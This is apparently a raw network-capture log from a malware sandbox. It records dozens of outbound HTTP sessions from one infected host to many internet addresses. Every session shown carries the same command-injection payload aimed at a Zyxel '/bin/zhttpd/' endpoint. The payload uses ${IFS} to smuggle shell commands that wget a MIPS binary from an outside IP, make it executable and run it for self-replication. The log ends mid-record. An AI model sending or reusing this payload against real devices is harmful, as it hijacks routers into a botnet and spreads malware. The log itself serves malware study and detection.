                                                  Jan 19, 2024 18:24:12.381998062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8531192.168.2.1342156145.145.211.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382047892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8532192.168.2.1333328163.253.87.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382096052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8533192.168.2.133430659.255.2.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382119894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8534192.168.2.1338152130.66.239.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382177114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8535192.168.2.1358084134.253.206.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382200956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8536192.168.2.13559641.161.172.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382241011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8537192.168.2.134820684.148.69.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382277012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8538192.168.2.134984061.81.67.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382328033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8539192.168.2.13352522.191.80.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382383108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8540192.168.2.1338814210.128.103.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382441998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8541192.168.2.1332944129.192.198.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382463932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8542192.168.2.1333382128.27.150.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382493019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8543192.168.2.1358858189.117.45.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382528067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8544192.168.2.134143851.235.0.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382571936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8545192.168.2.1334878212.183.251.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382632971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8546192.168.2.1358522166.240.130.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382682085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8547192.168.2.1349358194.71.178.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382718086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8548192.168.2.133968461.221.185.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382762909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8549192.168.2.134123667.142.144.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382797003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8550192.168.2.135387663.243.178.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382817984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8551192.168.2.1352440149.56.126.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382867098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8552192.168.2.1352690100.164.41.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382932901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8553192.168.2.134258864.142.147.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.382981062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8554192.168.2.1336984165.75.38.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383023024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8555192.168.2.1337954156.224.94.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383070946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8556192.168.2.135395623.180.74.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383078098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8557192.168.2.133765240.115.42.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383132935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8558192.168.2.13581164.93.82.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383168936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8559192.168.2.1339198210.102.215.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383205891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8560192.168.2.1341478213.138.114.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383244991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8561192.168.2.13512785.222.217.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383302927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8562192.168.2.1340620137.127.189.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383342028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8563192.168.2.134036460.171.187.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.383395910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8564192.168.2.136012486.66.109.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.394718885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8565192.168.2.1360302120.47.169.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.394782066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8566192.168.2.133968280.196.130.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.394818068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8567192.168.2.135571238.131.253.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.394874096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8568192.168.2.1347780220.223.27.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.394901991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8569192.168.2.133686092.16.248.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.394951105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8570192.168.2.1348256162.108.2.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.394984007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8571192.168.2.134646295.18.68.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395039082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8572192.168.2.1334396116.126.12.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395068884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8573192.168.2.1338624187.66.23.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395117998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8574192.168.2.1345444160.52.159.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395167112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8575192.168.2.13478285.170.111.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395195961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8576192.168.2.1345362162.235.17.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395241022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8577192.168.2.1334072162.125.82.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395282030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8578192.168.2.1334548160.229.201.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395330906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8579192.168.2.1360084180.28.109.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395385027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8580192.168.2.1347342152.194.239.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395414114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8581192.168.2.135679485.206.84.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395459890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8582192.168.2.1341782213.153.126.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395502090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8583192.168.2.1357088179.222.160.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395555019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8584192.168.2.1346072180.254.201.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395606995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8585192.168.2.1352352195.88.105.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395649910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8586192.168.2.1343940170.90.22.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395690918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8587192.168.2.135931882.193.244.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395741940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8588192.168.2.1334672184.72.196.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395771980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8589192.168.2.1359676190.253.41.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395818949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8590192.168.2.135815095.5.207.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395853043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8591192.168.2.136027694.244.188.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395941973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8592192.168.2.135318217.56.21.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:13.395962954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8593192.168.2.135125027.28.24.101443
                                                  TimestampBytes transferredDirectionData
